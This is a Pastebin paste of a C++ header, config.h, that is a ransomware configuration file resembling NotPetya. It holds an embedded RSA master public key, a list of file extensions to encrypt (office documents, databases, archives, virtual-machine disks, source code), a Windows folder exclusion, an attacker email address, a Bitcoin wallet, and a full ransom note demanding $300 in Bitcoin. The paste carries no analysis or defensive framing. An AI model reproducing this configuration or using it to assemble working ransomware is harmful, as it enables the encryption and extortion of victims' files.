Advertisement
FlyFar

config.h

Mar 24th, 2024
682
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 2.11 KB | Cybersecurity | 0 0
  1. #ifndef __CONFIG_H__
  2. #define __CONFIG_H__
  3.  
  4. #define MASTER_RSA_PUB L"MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwL" \
  5.                        "hQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15w" \
  6.                        "VLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68E" \
  7.                        "ZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQAB"
  8.  
  9. #define FILE_EXT_WHITE L".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb" \
  10.                        L".gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln"  \
  11.                        L".sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip."
  12.                        
  13. #define FOLDER_BLCKLST L"C:\\Windows;"
  14.  
  15. //
  16. #define RANSOM_NOTE_EML1 L"wowsmith123456@posteo.net"
  17.  
  18. #define BITCOIN_ADDRESS1 L"1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX"
  19.  
  20. #define RANSOM_NOTE_NAME L"README.TXT"
  21.  
  22. #define RANSOM_NOTE_TXT1 L"Ooops, your important files are encrypted.\r\n" \
  23.                          L"\r\n" \
  24.                          L"If you see this text, then your files are no longer accessible, because\r\n" \
  25.                          L"they have been encrypted. Perhaps you are busy looking for a way to recover\r\n" \
  26.                          L"your files, but don't waste your time. Nobody can recover your files without\r\n" \
  27.                          L"our decryption service.\r\n" \
  28.                          L"\r\n" \
  29.                          L"We guarantee that you can recover all your files safely and easily.\r\n" \
  30.                          L"All you need to do is submit the payment and purchase the decryption key.\r\n" \
  31.                          L"\r\n" \
  32.                          L"Please follow the instructions:\r\n" \
  33.                          L"\r\n" \
  34.                          L"1.\tSend $300 worth of Bitcoin to following address:\r\n" \
  35.                          L"\r\n"
  36.                          
  37. #define RANSOM_NOTE_TXT2 L"2.\tSend your Bitcoin wallet ID and personal installation key to e-mail "
  38.  
  39. #define RANSOM_NOTE_TXT3 L"\tYour personal installation key:\r\n\r\n"
  40.  
  41. #define MAX_BLOCK_NCRYPT 0x100000
  42.  
  43. #define TIME_WAIT_DEFAULT 1;
  44.  
  45. #endif
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement